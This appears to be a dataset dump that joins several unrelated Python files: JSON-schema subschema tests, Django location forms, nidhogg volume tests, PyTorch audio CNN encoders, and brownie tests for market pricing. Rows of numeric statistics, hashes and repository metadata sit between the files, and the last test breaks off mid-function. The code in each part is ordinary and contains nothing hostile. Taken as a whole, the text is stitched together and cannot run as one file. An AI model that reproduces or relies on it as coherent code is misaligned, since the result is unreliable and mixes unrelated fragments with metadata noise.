        s2 = {"type": "number", "multipleOf": 3,
              "allOf": [{"type": "integer"}, {"type": "number", "multipleOf": 3}]}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_enum1(self):
        s1 = {"enum": [1, 2, 3]}
        s2 = {"type": "number"}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_enum2(self):
        # JSON equality: 1.0 == 1 and 2 == 2.0, so s2's values are in s1.
        s1 = {"enum": [1.0, 2, 3]}
        s2 = {"enum": [1, 2.0]}
        with self.subTest():
            self.assertFalse(isSubschema(s1, s2))
        with self.subTest():
            self.assertTrue(isSubschema(s2, s1))

    def test_enum3(self):
        s1 = {"enum": [1, 2, 3]}
        s2 = {"type": "integer"}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))

    def test_enum4(self):
        # 2.0 still counts as an integer under JSON Schema's "integer" type.
        s1 = {"enum": [1, 2.0, 3]}
        s2 = {"type": "integer"}
        with self.subTest():
            self.assertTrue(isSubschema(s1, s2))
        with self.subTest():
            self.assertFalse(isSubschema(s2, s1))
| 38.489736
| 195
| 0.535848
| 2,803
| 26,250
| 4.95041
| 0.046022
| 0.085327
| 0.159988
| 0.197175
| 0.930888
| 0.917411
| 0.887936
| 0.854785
| 0.828193
| 0.812266
| 0
| 0.049065
| 0.287238
| 26,250
| 681
| 196
| 38.546256
| 0.692571
| 0.014705
| 0
| 0.77931
| 0
| 0
| 0.17
| 0
| 0
| 0
| 0
| 0
| 0.256897
| 1
| 0.132759
| false
| 0
| 0.005172
| 0
| 0.144828
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ce2a5210be26ac16ba0265bf5eec10423ac7ecf8
| 7,713
|
py
|
Python
|
regions/forms.py
|
aliibsamohammed/django_country_location
|
88eb48d1a8b2375bbd239752b3bee6d5ce1274fc
|
[
"MIT"
] | null | null | null |
regions/forms.py
|
aliibsamohammed/django_country_location
|
88eb48d1a8b2375bbd239752b3bee6d5ce1274fc
|
[
"MIT"
] | null | null | null |
regions/forms.py
|
aliibsamohammed/django_country_location
|
88eb48d1a8b2375bbd239752b3bee6d5ce1274fc
|
[
"MIT"
] | null | null | null |
from django import forms
from .models import Continent, SubContinent, Country, State, City, Region, TimeZone
class TimeZoneCreateForm(forms.ModelForm):
    """ModelForm exposing every TimeZone field for creation."""

    class Meta:
        model = TimeZone
        fields = "__all__"
class ContinentCreateForm(forms.ModelForm):
    """ModelForm exposing every Continent field for creation."""

    class Meta:
        model = Continent
        fields = "__all__"
class SubContinentCreateForm(forms.ModelForm):
    """ModelForm exposing every SubContinent field for creation."""

    class Meta:
        model = SubContinent
        fields = "__all__"
class CountryCreateForm(forms.ModelForm):
    """ModelForm exposing every Country field for creation."""

    class Meta:
        model = Country
        fields = "__all__"
class StateCreateForm(forms.ModelForm):
    """ModelForm exposing every State field for creation."""

    class Meta:
        model = State
        fields = "__all__"
class CityCreateForm(forms.ModelForm):
    """Create form for City whose 'state' choices depend on the chosen country.

    The state dropdown starts empty and is narrowed to the selected
    country's states, either from submitted POST data or from the bound
    instance when editing.
    """

    class Meta:
        model = City
        fields = '__all__'

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Start with no selectable states; a parent country must be chosen.
        self.fields['state'].queryset = State.objects.none()
        if 'country' in self.data:
            # Bound form: narrow states to the country submitted by the client.
            try:
                country_id = int(self.data.get('country'))
                self.fields['state'].queryset = State.objects.filter(country_id=country_id).order_by('state_name')
            except (ValueError, TypeError):
                pass  # invalid input from the client; ignore and leave the state queryset empty
        elif self.instance.pk:
            # Editing an existing City: offer the states of its current country.
            self.fields['state'].queryset = self.instance.country.state_set.order_by('state_name')
class RegionCreateForm(forms.ModelForm):
    """Create form for Region with chained location dropdowns.

    Each dependent dropdown (sub_continent -> country -> state -> city)
    starts empty and is narrowed from its parent's selection, taken from
    submitted POST data or from the bound instance when editing.
    """

    class Meta:
        model = Region
        fields = '__all__'

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Reset every dependent dropdown; they are filled in below.
        self.fields['sub_continent'].queryset = SubContinent.objects.none()
        self.fields['country'].queryset = Country.objects.none()
        self.fields['state'].queryset = State.objects.none()
        self.fields['city'].queryset = City.objects.none()
        # BUG FIX: the form field is 'sub_continent' (the key reset above,
        # which runs unconditionally); the original mixed in 'subcontinent'
        # for both the fields[] lookups and the self.data keys, so these
        # branches either raised KeyError or never matched the posted data.
        # The model-level names (filter kwargs and instance attributes) are
        # kept as written — TODO confirm against the Region/Country models.
        if 'continent' in self.data:
            try:
                continent_id = int(self.data.get('continent'))
                self.fields['sub_continent'].queryset = SubContinent.objects.filter(continent_id=continent_id).order_by('name')
            except (ValueError, TypeError):
                pass  # invalid client input; leave the sub_continent queryset empty
        elif self.instance.pk:
            self.fields['sub_continent'].queryset = self.instance.continent.subcontinent_set.order_by('name')
        if 'sub_continent' in self.data:
            try:
                subcontinent_id = int(self.data.get('sub_continent'))
                self.fields['country'].queryset = Country.objects.filter(subcontinent_id=subcontinent_id).order_by('name')
            except (ValueError, TypeError):
                pass  # invalid client input; leave the country queryset empty
        elif self.instance.pk:
            self.fields['country'].queryset = self.instance.subcontinent.country_set.order_by('name')
        if 'country' in self.data:
            try:
                country_id = int(self.data.get('country'))
                self.fields['state'].queryset = State.objects.filter(country_id=country_id).order_by('state_name')
            except (ValueError, TypeError):
                pass  # invalid client input; leave the state queryset empty
        elif self.instance.pk:
            self.fields['state'].queryset = self.instance.country.state_set.order_by('state_name')
        if 'state' in self.data:
            try:
                state_id = int(self.data.get('state'))
                self.fields['city'].queryset = City.objects.filter(state_id=state_id).order_by('city_name')
            except (ValueError, TypeError):
                pass  # invalid client input; leave the city queryset empty
        elif self.instance.pk:
            self.fields['city'].queryset = self.instance.state.city_set.order_by('city_name')
class TimeZoneUpdateForm(forms.ModelForm):
    """ModelForm exposing every TimeZone field for editing."""

    class Meta:
        model = TimeZone
        fields = "__all__"
class ContinentUpdateForm(forms.ModelForm):
    """ModelForm exposing every Continent field for editing."""

    class Meta:
        model = Continent
        fields = "__all__"
class SubContinentUpdateForm(forms.ModelForm):
    """ModelForm exposing every SubContinent field for editing."""

    class Meta:
        model = SubContinent
        fields = "__all__"
class CountryUpdateForm(forms.ModelForm):
    """ModelForm exposing every Country field for editing."""

    class Meta:
        model = Country
        fields = "__all__"
class StateUpdateForm(forms.ModelForm):
    """ModelForm exposing every State field for editing."""

    class Meta:
        model = State
        fields = "__all__"
class CityUpdateForm(forms.ModelForm):
    """ModelForm exposing every City field for editing.

    Unlike CityCreateForm, this form does not chain the 'state' dropdown
    to a country selection.  A stale, stringified copy of
    CityCreateForm.__init__ used to sit here as a discarded class-level
    string literal; it has been removed as dead code.
    """

    class Meta:
        model = City
        fields = '__all__'
class RegionUpdateForm(forms.ModelForm):
    """Update form for Region with chained location dropdowns.

    Same chaining as RegionCreateForm: sub_continent -> country -> state
    -> city, each narrowed from the parent's selection in POST data or
    from the bound instance.
    """

    class Meta:
        model = Region
        fields = '__all__'

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Reset every dependent dropdown; they are filled in below.
        self.fields['sub_continent'].queryset = SubContinent.objects.none()
        self.fields['country'].queryset = Country.objects.none()
        self.fields['state'].queryset = State.objects.none()
        self.fields['city'].queryset = City.objects.none()
        # BUG FIX: the form field is 'sub_continent' (the key reset above,
        # which runs unconditionally); the original mixed in 'subcontinent'
        # for both the fields[] lookups and the self.data keys, so these
        # branches either raised KeyError or never matched the posted data.
        # The model-level names (filter kwargs and instance attributes) are
        # kept as written — TODO confirm against the Region/Country models.
        if 'continent' in self.data:
            try:
                continent_id = int(self.data.get('continent'))
                self.fields['sub_continent'].queryset = SubContinent.objects.filter(continent_id=continent_id).order_by('name')
            except (ValueError, TypeError):
                pass  # invalid client input; leave the sub_continent queryset empty
        elif self.instance.pk:
            self.fields['sub_continent'].queryset = self.instance.continent.subcontinent_set.order_by('name')
        if 'sub_continent' in self.data:
            try:
                subcontinent_id = int(self.data.get('sub_continent'))
                self.fields['country'].queryset = Country.objects.filter(subcontinent_id=subcontinent_id).order_by('name')
            except (ValueError, TypeError):
                pass  # invalid client input; leave the country queryset empty
        elif self.instance.pk:
            self.fields['country'].queryset = self.instance.subcontinent.country_set.order_by('name')
        if 'country' in self.data:
            try:
                country_id = int(self.data.get('country'))
                self.fields['state'].queryset = State.objects.filter(country_id=country_id).order_by('state_name')
            except (ValueError, TypeError):
                pass  # invalid client input; leave the state queryset empty
        elif self.instance.pk:
            self.fields['state'].queryset = self.instance.country.state_set.order_by('state_name')
        if 'state' in self.data:
            try:
                state_id = int(self.data.get('state'))
                self.fields['city'].queryset = City.objects.filter(state_id=state_id).order_by('city_name')
            except (ValueError, TypeError):
                pass  # invalid client input; leave the city queryset empty
        elif self.instance.pk:
            self.fields['city'].queryset = self.instance.state.city_set.order_by('city_name')
| 37.808824
| 126
| 0.627771
| 862
| 7,713
| 5.431555
| 0.081207
| 0.064075
| 0.056813
| 0.068774
| 0.924391
| 0.924391
| 0.924391
| 0.924391
| 0.924391
| 0.817172
| 0
| 0
| 0.259821
| 7,713
| 203
| 127
| 37.995074
| 0.820109
| 0.086218
| 0
| 0.889655
| 0
| 0
| 0.087058
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02069
| false
| 0.062069
| 0.013793
| 0
| 0.227586
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
ce3fd7c4623396b15cfc3a1242c0b0ad4cb50c90
| 7,777
|
py
|
Python
|
tests/test_get_volume_for_home.py
|
ifxit/nidho
|
7d49bb7d879d0f3d444df50f2c18c2cdf883216c
|
[
"MIT"
] | 11
|
2016-06-09T12:07:14.000Z
|
2018-01-18T08:01:08.000Z
|
tests/test_get_volume_for_home.py
|
ifxit/nidho
|
7d49bb7d879d0f3d444df50f2c18c2cdf883216c
|
[
"MIT"
] | 4
|
2016-07-06T11:06:34.000Z
|
2020-01-02T10:11:48.000Z
|
tests/test_get_volume_for_home.py
|
ifxit/nidhogg
|
7d49bb7d879d0f3d444df50f2c18c2cdf883216c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import pytest
from nidhogg.sevenmode import SevenMode
from nidhogg.clustermode import ClusterMode
# Canned ClusterMode API response: three volumes. "name11" has type "dp"
# (data-protection mirror) — the tests below expect it to be filtered out;
# "name12"/"name13" are "rw" and online.
cluster_ret_value = {
    'attributes-list': {
        'volume-attributes': [{
            'volume-id-attributes': {
                'name': "name11",
                'type': "dp",
            },
            'volume-state-attributes': {'state': "online"},
            'volume-space-attributes': {
                "size-total": "120259084288",
                "size-used": "9575825408",
                "size-available": "110683258880",
            },
            'volume-inode-attributes': {
                "files-total": "4358138",
                "files-used": "14024",
            }
        }, {
            'volume-id-attributes': {
                'name': "name12",
                'type': "rw",
            },
            'volume-state-attributes': {'state': "online"},
            'volume-space-attributes': {
                "size-total": "1202590842",
                "size-used": "95758254",
                "size-available": "1106832588",
            },
            'volume-inode-attributes': {
                "files-total": "4358138",
                "files-used": "14024",
            }
        }, {
            'volume-id-attributes': {
                'name': "name13",
                'type': "rw",
            },
            'volume-state-attributes': {'state': "online"},
            'volume-space-attributes': {
                "size-total": "1202590842",
                "size-used": "95758334",
                "size-available": "1106832508",
            },
            'volume-inode-attributes': {
                "files-total": "4358138",
                "files-used": "14024",
            }
        }]
    },
    'num-records': '3'
}

# Equivalent SevenMode response: same three volumes in the flat 7-mode
# layout; here "name11" is marked by raid-status "snapmirror" instead of
# a "dp" type, with the same expected filtering outcome.
seven_ret_value = {
    'volumes': {
        'volume-info': [{
            'name': "name11",
            'state': "online",
            "size-total": "120259084288",
            "size-used": "9575825408",
            "size-available": "110683258880",
            "files-total": "4358138",
            "files-used": "14024",
            "raid-status": "snapmirror",
        }, {
            'name': "name12",
            'state': "online",
            "size-total": "1202590842",
            "size-used": "95758254",
            "size-available": "1106832588",
            "files-total": "4358138",
            "files-used": "14024",
            "raid-status": "ok",
        }, {
            'name': "name13",
            'state': "online",
            "size-total": "1202590842",
            "size-used": "95758334",
            "size-available": "1106832508",
            "files-total": "4358138",
            "files-used": "14024",
            "raid-status": "ok",
        }]
    }
}
@pytest.mark.parametrize('mode', [
    (ClusterMode, cluster_ret_value),
    (SevenMode, seven_ret_value)
], indirect=True)
def test_get_volume_for_project(mode, monkeypatch):
    """Quota-annotated listing returns only online rw volumes."""
    # Stub the quota helpers so quota fields are deterministic.
    monkeypatch.setattr(
        "nidhogg.core.Nidhogg.get_allocated_quota_size",
        lambda *args, **kwargs: 12345.0)
    monkeypatch.setattr(
        "nidhogg.core.Nidhogg.get_allocated_quota_ratio",
        lambda *args, **kwargs: 0.1)

    listed = mode.get_volumes_with_quota_info(filter_volume_names=[])

    # "name11" is absent: only online volumes of type rw are returned.
    shared = {
        'filer': u'my.url.to.filer',
        'files_total': 4358138.0,
        'files_used': 14024.0,
        'state': 'online',
        'snapable': True,
        'quota_ratio': 0.1,
        'quota_size': 12345.0,
    }
    assert listed == [
        dict(shared, name='name12', size_available=1106832588.0,
             size_total=1202590842.0, size_used=95758254.0),
        dict(shared, name='name13', size_available=1106832508.0,
             size_total=1202590842.0, size_used=95758334.0),
    ]
@pytest.mark.parametrize('mode', [
    (ClusterMode, cluster_ret_value),
    (SevenMode, seven_ret_value)
], indirect=True)
def test_get_volume_for_project_with_filter(mode, monkeypatch):
    """A name filter restricts the quota-annotated listing to the named volume."""
    # Stub the quota helpers so quota fields are deterministic.
    monkeypatch.setattr(
        "nidhogg.core.Nidhogg.get_allocated_quota_size",
        lambda *args, **kwargs: 12345.0)
    monkeypatch.setattr(
        "nidhogg.core.Nidhogg.get_allocated_quota_ratio",
        lambda *args, **kwargs: 0.1)

    listed = mode.get_volumes_with_quota_info(filter_volume_names=["name12"])

    assert listed == [{
        'filer': u'my.url.to.filer',
        'files_total': 4358138.0,
        'files_used': 14024.0,
        'name': 'name12',
        'size_available': 1106832588.0,
        'size_total': 1202590842.0,
        'size_used': 95758254.0,
        'state': 'online',
        'snapable': True,
        'quota_ratio': 0.1,
        'quota_size': 12345.0,
    }]
@pytest.mark.parametrize('mode', [
    (ClusterMode, cluster_ret_value),
    (SevenMode, seven_ret_value)
], indirect=True)
def test_get_volume_for_user(mode):
    """get_volumes returns only online rw volumes ("name11" is excluded)."""
    listed = mode.get_volumes(filter_volume_names=[])

    shared = {
        'filer': u'my.url.to.filer',
        'files_total': 4358138.0,
        'files_used': 14024.0,
        'state': 'online',
        'snapable': True,
    }
    assert listed == [
        dict(shared, name='name12', size_available=1106832588.0,
             size_total=1202590842.0, size_used=95758254.0),
        dict(shared, name='name13', size_available=1106832508.0,
             size_total=1202590842.0, size_used=95758334.0),
    ]
@pytest.mark.parametrize('mode', [
    (ClusterMode, cluster_ret_value),
    (SevenMode, seven_ret_value)
], indirect=True)
def test_get_volume_for_user_with_filter(mode):
    """A name filter restricts get_volumes to the named volume only."""
    listed = mode.get_volumes(filter_volume_names=['name12'])

    assert listed == [{
        'filer': u'my.url.to.filer',
        'files_total': 4358138.0,
        'files_used': 14024.0,
        'name': 'name12',
        'size_available': 1106832588.0,
        'size_total': 1202590842.0,
        'size_used': 95758254.0,
        'state': 'online',
        'snapable': True,
    }]
| 31.613821
| 90
| 0.501864
| 731
| 7,777
| 5.138167
| 0.128591
| 0.021299
| 0.063365
| 0.023429
| 0.903088
| 0.896699
| 0.896699
| 0.890841
| 0.879925
| 0.739617
| 0
| 0.139168
| 0.347692
| 7,777
| 245
| 91
| 31.742857
| 0.601222
| 0.090523
| 0
| 0.778894
| 0
| 0
| 0.282044
| 0.055216
| 0
| 0
| 0
| 0
| 0.020101
| 1
| 0.040201
| false
| 0
| 0.020101
| 0.020101
| 0.080402
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
020ea8033963d2ba84debc0b7df4adade608b0d0
| 7,867
|
py
|
Python
|
models/sed_encoders.py
|
thomeou/General-network-architecture-for-sound-event-localization-and-detection
|
03b3aaccf3c87dd8fb857960e765ae768ad36625
|
[
"MIT"
] | 4
|
2020-12-04T11:57:20.000Z
|
2022-03-12T15:23:03.000Z
|
models/sed_encoders.py
|
mammothb/General-network-architecture-for-sound-event-localization-and-detection
|
03b3aaccf3c87dd8fb857960e765ae768ad36625
|
[
"MIT"
] | 3
|
2021-08-02T09:16:17.000Z
|
2021-12-15T13:24:13.000Z
|
models/sed_encoders.py
|
mammothb/General-network-architecture-for-sound-event-localization-and-detection
|
03b3aaccf3c87dd8fb857960e765ae768ad36625
|
[
"MIT"
] | 4
|
2021-01-23T10:18:46.000Z
|
2021-11-09T15:01:51.000Z
|
import logging
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision.models as models
from models.model_utils import ConvBlock, init_layer, _ResNet3, _ResNet, _ResnetBasicBlock
class PannCnn14L6(nn.Module):
    """
    Derived from PANN CNN14 network. PannCnn14L6 has 6 CNN layers (3 convblock).
    Output feature map has 256 channels; time and frequency are each
    downsampled by 8 (three 2x2 average pools).
    """

    def __init__(self, n_input_channels: int = 1, p_dropout: float = 0.2, pretrained: bool = False, **kwargs):
        """
        :param n_input_channels: Number of input channels.
        :param p_dropout: Dropout probability.
        :param pretrained: If True, load pretrained model.
        """
        super().__init__()
        self.n_input_channels = n_input_channels
        self.p_dropout = p_dropout
        self.n_output_channels = 256
        # 2x2 pooling in each of the three blocks -> 2**3 = 8 in both axes.
        self.time_downsample_ratio = 8
        self.freq_downsample_ratio = 8

        self.conv_block1 = ConvBlock(in_channels=n_input_channels, out_channels=64)
        self.conv_block2 = ConvBlock(in_channels=64, out_channels=128)
        self.conv_block3 = ConvBlock(in_channels=128, out_channels=256)

        # Load pretrained model
        self.load_pretrained_weight(pretrained=pretrained)

    def load_pretrained_weight(self, pretrained: bool = False):
        """Optionally load PANN CNN14 checkpoint weights (non-strict match)."""
        logger = logging.getLogger('lightning')
        # NOTE(review): path is relative to the working directory — confirm layout.
        pretrained_path = '../pretrained_models/Cnn14_DecisionLevelAtt_mAP=0.425.pth'
        if pretrained:
            checkpoint = torch.load(pretrained_path, map_location=lambda storage, loc: storage)
            try:
                # strict=False: only layers whose names/shapes match are loaded.
                self.load_state_dict(checkpoint['model'], strict=False)
                logger.info('Load pretrained weights from checkpoint {}.'.format(pretrained_path))
            except Exception:
                # Was a bare `except:` (also caught KeyboardInterrupt/SystemExit);
                # narrowed, logged at warning level, and typo "Coud" fixed.
                logger.warning('Could not load pretrained weights from checkpoint {}.'.format(pretrained_path))

    def forward(self, x):
        """
        Input x: (batch_size, n_channels, n_timesteps/n_frames, n_features/n_freqs)
        """
        x = self.conv_block1(x, pool_size=(2, 2), pool_type='avg')
        x = F.dropout(x, p=self.p_dropout, training=self.training)
        x = self.conv_block2(x, pool_size=(2, 2), pool_type='avg')
        x = F.dropout(x, p=self.p_dropout, training=self.training)
        x = self.conv_block3(x, pool_size=(2, 2), pool_type='avg')
        x = F.dropout(x, p=self.p_dropout, training=self.training)
        return x

    @property
    def count_number_of_params(self):
        """Return (total, trainable) parameter counts."""
        # Generator expressions instead of throwaway list comprehensions.
        n_params = sum(param.numel() for param in self.parameters())
        n_trainable_params = sum(param.numel() for param in self.parameters() if param.requires_grad)
        return n_params, n_trainable_params
class PannCnn14L6F64(nn.Module):
    """
    Derived from PANN CNN14 network. PannCnn14L6F64 has 6 CNN layers
    (3 convblock) like PannCnn14L6, but pools 2x4 per block, giving a
    frequency downsample of 64 (time downsample stays 8).
    """

    def __init__(self, n_input_channels: int = 1, p_dropout: float = 0.2, pretrained: bool = False, **kwargs):
        """
        :param n_input_channels: Number of input channels.
        :param p_dropout: Dropout probability.
        :param pretrained: If True, load pretrained model.
        """
        super().__init__()
        self.n_input_channels = n_input_channels
        self.p_dropout = p_dropout
        self.n_output_channels = 256
        # 2x4 pooling in each of three blocks -> time 2**3 = 8, freq 4**3 = 64.
        self.time_downsample_ratio = 8
        self.freq_downsample_ratio = 64

        self.conv_block1 = ConvBlock(in_channels=n_input_channels, out_channels=64)
        self.conv_block2 = ConvBlock(in_channels=64, out_channels=128)
        self.conv_block3 = ConvBlock(in_channels=128, out_channels=256)

        # Load pretrained model
        self.load_pretrained_weight(pretrained=pretrained)

    def load_pretrained_weight(self, pretrained: bool = False):
        """Optionally load PANN CNN14 checkpoint weights (non-strict match)."""
        logger = logging.getLogger('lightning')
        # NOTE(review): path is relative to the working directory — confirm layout.
        pretrained_path = '../pretrained_models/Cnn14_DecisionLevelAtt_mAP=0.425.pth'
        if pretrained:
            checkpoint = torch.load(pretrained_path, map_location=lambda storage, loc: storage)
            try:
                # strict=False: only layers whose names/shapes match are loaded.
                self.load_state_dict(checkpoint['model'], strict=False)
                logger.info('Load pretrained weights from checkpoint {}.'.format(pretrained_path))
            except Exception:
                # Was a bare `except:` (also caught KeyboardInterrupt/SystemExit);
                # narrowed, logged at warning level, and typo "Coud" fixed.
                logger.warning('Could not load pretrained weights from checkpoint {}.'.format(pretrained_path))

    def forward(self, x):
        """
        Input x: (batch_size, n_channels, n_timesteps/n_frames, n_features/n_freqs)
        """
        x = self.conv_block1(x, pool_size=(2, 4), pool_type='avg')
        x = F.dropout(x, p=self.p_dropout, training=self.training)
        x = self.conv_block2(x, pool_size=(2, 4), pool_type='avg')
        x = F.dropout(x, p=self.p_dropout, training=self.training)
        x = self.conv_block3(x, pool_size=(2, 4), pool_type='avg')
        x = F.dropout(x, p=self.p_dropout, training=self.training)
        return x

    @property
    def count_number_of_params(self):
        """Return (total, trainable) parameter counts."""
        n_params = sum(param.numel() for param in self.parameters())
        n_trainable_params = sum(param.numel() for param in self.parameters() if param.requires_grad)
        return n_params, n_trainable_params
class PannCnn14L8(nn.Module):
    """
    Derived from PANN CNN14 network. PannCnn14L8 has 8 CNN layers (4 convblock).
    Output feature map has 512 channels; time and frequency are each
    downsampled by 16 (four 2x2 average pools).
    """

    def __init__(self, n_input_channels: int = 1, p_dropout: float = 0.2, pretrained: bool = False, **kwargs):
        """
        :param n_input_channels: Number of input channels.
        :param p_dropout: Dropout probability.
        :param pretrained: If True, load pretrained model.
        """
        super().__init__()
        self.n_input_channels = n_input_channels
        self.p_dropout = p_dropout
        self.n_output_channels = 512
        # 2x2 pooling in each of four blocks -> 2**4 = 16 in both axes.
        self.time_downsample_ratio = 16
        self.freq_downsample_ratio = 16

        self.conv_block1 = ConvBlock(in_channels=n_input_channels, out_channels=64)
        self.conv_block2 = ConvBlock(in_channels=64, out_channels=128)
        self.conv_block3 = ConvBlock(in_channels=128, out_channels=256)
        self.conv_block4 = ConvBlock(in_channels=256, out_channels=512)

        # Load pretrained model
        self.load_pretrained_weight(pretrained=pretrained)

    def load_pretrained_weight(self, pretrained: bool = False):
        """Optionally load PANN CNN14 checkpoint weights (non-strict match)."""
        logger = logging.getLogger('lightning')
        # NOTE(review): path is relative to the working directory — confirm layout.
        pretrained_path = '../pretrained_models/Cnn14_DecisionLevelAtt_mAP=0.425.pth'
        if pretrained:
            checkpoint = torch.load(pretrained_path, map_location=lambda storage, loc: storage)
            try:
                # strict=False: only layers whose names/shapes match are loaded.
                self.load_state_dict(checkpoint['model'], strict=False)
                logger.info('Load pretrained weights from checkpoint {}.'.format(pretrained_path))
            except Exception:
                # Was a bare `except:` (also caught KeyboardInterrupt/SystemExit);
                # narrowed, logged at warning level, and typo "Coud" fixed.
                logger.warning('Could not load pretrained weights from checkpoint {}.'.format(pretrained_path))

    def forward(self, x):
        """
        Input x: (batch_size, n_channels, n_timesteps/n_frames, n_features/n_freqs)
        """
        x = self.conv_block1(x, pool_size=(2, 2), pool_type='avg')
        x = F.dropout(x, p=self.p_dropout, training=self.training)
        x = self.conv_block2(x, pool_size=(2, 2), pool_type='avg')
        x = F.dropout(x, p=self.p_dropout, training=self.training)
        x = self.conv_block3(x, pool_size=(2, 2), pool_type='avg')
        x = F.dropout(x, p=self.p_dropout, training=self.training)
        x = self.conv_block4(x, pool_size=(2, 2), pool_type='avg')
        x = F.dropout(x, p=self.p_dropout, training=self.training)
        return x

    @property
    def count_number_of_params(self):
        """Return (total, trainable) parameter counts."""
        n_params = sum(param.numel() for param in self.parameters())
        n_trainable_params = sum(param.numel() for param in self.parameters() if param.requires_grad)
        return n_params, n_trainable_params
# Quick smoke test: instantiate the 8-layer encoder and report its size.
if __name__ == '__main__':
    encoder = PannCnn14L8()
    print(encoder.count_number_of_params)
    print(encoder)
| 42.989071
| 116
| 0.663785
| 1,031
| 7,867
| 4.812803
| 0.123181
| 0.03547
| 0.042322
| 0.020153
| 0.915357
| 0.915357
| 0.915357
| 0.908303
| 0.908303
| 0.908303
| 0
| 0.027366
| 0.228931
| 7,867
| 182
| 117
| 43.225275
| 0.790636
| 0.120122
| 0
| 0.805085
| 0
| 0
| 0.084181
| 0.025568
| 0
| 0
| 0
| 0
| 0
| 1
| 0.101695
| false
| 0
| 0.050847
| 0
| 0.228814
| 0.016949
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
02575a747344b075c67ae4cbf89816c194cb3401
| 5,768
|
py
|
Python
|
tests/markets/test_price.py
|
overlay-market/v1-core
|
e18fabd242f21c243a555712d3f08ca059941f41
|
[
"MIT"
] | 3
|
2022-02-17T16:11:39.000Z
|
2022-03-10T23:46:19.000Z
|
tests/markets/test_price.py
|
overlay-market/v1-core
|
e18fabd242f21c243a555712d3f08ca059941f41
|
[
"MIT"
] | 10
|
2022-01-25T21:49:20.000Z
|
2022-03-31T00:32:29.000Z
|
tests/markets/test_price.py
|
overlay-market/v1-core
|
e18fabd242f21c243a555712d3f08ca059941f41
|
[
"MIT"
] | 2
|
2022-01-21T01:04:54.000Z
|
2022-02-23T08:38:20.000Z
|
from brownie import reverts
from brownie.test import given, strategy
from decimal import Decimal
from math import exp
from pytest import approx
from .utils import RiskParameter
def test_bid_adds_static_spread(market, rando):
    """With zero volume, bid applies only the static spread e^(-delta)."""
    # delta risk parameter index
    delta_idx = RiskParameter.DELTA.value

    # price data comes from an update call (update itself is covered in test_update.py)
    data = market.update({"from": rando}).return_value
    _, _, _, price_micro, price_macro, _, _, _ = data
    delta = Decimal(market.params(delta_idx) / 1e18)

    # zero volume -> no market impact term; bids take the lower (worse)
    # of micro/macro and shrink it by e^(-delta)
    expect_bid = int(min(price_micro, price_macro) * exp(-delta))
    actual_bid = int(market.bid(data, 0))
    assert actual_bid == approx(expect_bid)
@given(
    volume=strategy('decimal', min_value='0.0001', max_value='1.0000',
                    places=4))
def test_bid_adds_market_impact(market, volume, rando):
    """Bid spread grows with traded volume: e^(-delta - lmbda*volume)."""
    # price data comes from an update call (update itself is covered in test_update.py)
    data = market.update({"from": rando}).return_value
    _, _, _, price_micro, price_macro, _, _, _ = data

    delta = Decimal(market.params(RiskParameter.DELTA.value) / 1e18)
    lmbda = Decimal(market.params(RiskParameter.LMBDA.value) / 1e18)

    # strategy spans 0.1% .. 100% of the cap; scale to wei-style units
    input_volume = volume * Decimal(1e18)

    # bids take the lower (worse) of micro/macro, shrunk by e^(-delta-lmbda*volume)
    expect_bid = int(min(price_micro, price_macro) * exp(-delta-lmbda*volume))
    actual_bid = int(market.bid(data, input_volume))
    assert actual_bid == approx(expect_bid)
def test_bid_reverts_when_slippage_greater_than_max(market, rando):
    """bid() reverts once delta + lmbda*volume would exceed the max pow."""
    # price data comes from an update call (update itself is covered in test_update.py)
    data = market.update({"from": rando}).return_value
    _, _, _, price_micro, price_macro, _, _, _ = data

    delta = Decimal(market.params(RiskParameter.DELTA.value) / 1e18)
    lmbda = Decimal(market.params(RiskParameter.LMBDA.value) / 1e18)

    tol = 1e-4  # tolerance put at +/- 1bps
    max_pow = 20
    max_volume = (max_pow - delta) / lmbda

    # just above the boundary -> must revert
    volume = Decimal(max_volume) * Decimal(1 + tol)
    input_volume = volume * Decimal(1e18)
    with reverts("OVLV1:slippage>max"):
        market.bid(data, input_volume)

    # just below the boundary -> must not revert
    volume = Decimal(max_volume) * Decimal(1 - tol)
    input_volume = volume * Decimal(1e18)
    _ = market.bid(data, input_volume)
def test_ask_adds_static_spread(market, rando):
    """With zero volume, ask applies only the static spread e^(+delta)."""
    # delta risk parameter index
    delta_idx = RiskParameter.DELTA.value

    # price data comes from an update call (update itself is covered in test_update.py)
    data = market.update({"from": rando}).return_value
    _, _, _, price_micro, price_macro, _, _, _ = data
    delta = Decimal(market.params(delta_idx) / 1e18)

